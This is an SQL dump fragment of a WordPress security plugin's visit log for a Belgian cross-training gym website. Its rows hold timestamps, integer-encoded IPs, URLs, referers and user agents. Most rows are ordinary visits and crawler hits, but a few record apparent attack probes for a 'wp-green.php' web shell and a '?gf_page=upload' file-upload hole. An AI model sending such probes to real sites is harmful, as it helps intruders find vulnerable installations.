(69445, 1492281866.709360, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69446, 1492281867.231128, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69447, 1492281867.755315, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69448, 1492281868.353030, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69449, 1492286166.481386, 3475901846, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69450, 1492286506.404340, 1055603543, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69451, 1492286677.636579, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69452, 1492286678.442110, 1055603543, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69453, 1492286707.548891, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69454, 1492286824.161055, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69455, 1492286925.831434, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69456, 1492286959.213340, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69457, 1492286965.101065, 1055603543, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69458, 1492286965.263013, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69459, 1492287065.368344, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69460, 1492287067.341941, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69461, 1492287093.259048, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69462, 1492287105.981564, 1055603543, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69463, 1492289825.478503, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69464, 1492290923.877838, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69465, 1492293123.979873, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69466, 1492293800.033770, 872290251, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-green.php', 'http://www.crossfitoswestry.com/blog//wp-green.php', 'Mozilla/4.0 (compatible  MSIE 8.0  Windows NT 5.1  Trident/4.0  WebMoney Advisor  .NET CLR 1.1.4322  .NET CLR 3.0.4506.2152  .NET CLR 3.5.30729  .NET CLR 2.0.50727)'),
(69467, 1492294105.242788, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69468, 1492294211.600134, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(69469, 1492314297.226012, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69470, 1492314300.250381, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69471, 1492320231.076107, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69472, 1492320231.618584, 100662546, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69473, 1492320234.415938, 2366145539, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69474, 1492320240.082692, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69475, 1492322219.405187, 3475901912, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69476, 1492341292.580279, 1055599009, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69477, 1492341293.695155, 1055599009, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69478, 1492342291.787419, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69479, 1492342292.308136, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69480, 1492342292.809373, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69481, 1492342293.274221, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69482, 1492342293.718451, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69483, 1492342294.155808, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69484, 1492342294.667518, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69485, 1492342295.165651, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69486, 1492342295.626886, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69487, 1492342296.275840, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69488, 1492342296.706298, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69489, 1492343282.196439, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69490, 1492343282.992048, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69491, 1492343283.694784, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69492, 1492343284.199502, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69493, 1492343284.670924, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69494, 1492343285.117555, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69495, 1492343285.714720, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69496, 1492343286.220605, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69497, 1492343286.749906, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69498, 1492343287.235585, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69499, 1492343287.751171, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69500, 1492348564.741462, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69501, 1492348564.742134, 3024883602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(69502, 1492348588.905290, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69503, 1492349979.640103, 676177792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69504, 1492349980.092211, 676177792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69505, 1492353522.326333, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69506, 1492353523.090811, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69507, 1492353523.518414, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69508, 1492353523.951640, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69509, 1492353524.402196, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69510, 1492353524.850391, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69511, 1492353525.339319, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69512, 1492353525.782875, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69513, 1492353526.775251, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69514, 1492353527.205326, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69515, 1492353527.732153, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69516, 1492355941.390782, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69517, 1492355949.135030, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69518, 1492355950.476026, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69519, 1492355950.883734, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69520, 1492355951.934909, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69521, 1492355952.336458, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69522, 1492355952.760772, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69523, 1492355953.314515, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69524, 1492355953.707346, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69525, 1492355954.098263, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69526, 1492355954.515568, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69527, 1492355954.963842, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69528, 1492355955.489049, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69529, 1492355955.913382, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69530, 1492359674.085036, 1837489426, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69531, 1492362509.129542, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69532, 1492362509.761802, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69533, 1492362510.496947, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69534, 1492362510.996274, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69535, 1492362511.445761, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69536, 1492362511.870553, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69537, 1492362512.494509, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69538, 1492362512.966109, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69539, 1492362513.395405, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69540, 1492362513.845402, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69541, 1492362514.320015, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69542, 1492365438.824119, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69543, 1492367000.468039, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(69544, 1492367000.972872, 1538566999, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69545, 1492367001.418152, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69546, 1492367001.835177, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69547, 1492367002.335672, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69548, 1492367002.743603, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69549, 1492367003.192322, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69550, 1492367005.495118, 1538566999, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(69551, 1492367005.900204, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69552, 1492367006.925653, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69553, 1492367007.583840, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69554, 1492367009.116215, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69555, 1492367010.011733, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69556, 1492367011.010803, 1538566999, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(69557, 1492368219.038297, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69558, 1492369234.899535, 876229871, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69559, 1492369237.839883, 876229871, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(69560, 1492370506.087985, 1055613552, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69561, 1492370511.642897, 1055613552, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0'),
(69562, 1492372576.961070, 1055613552, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://outlook.live.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G925F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69563, 1492372579.158034, 1055613552, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G925F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69564, 1492373629.523241, 1538379759, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),
(69565, 1492374287.047630, 3155896840, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?gf_page=upload', 'http://www.crosstrainingcenter.be/?gf_page=upload', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69566, 1492375498.798027, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69567, 1492375499.368416, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69568, 1492375499.837404, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
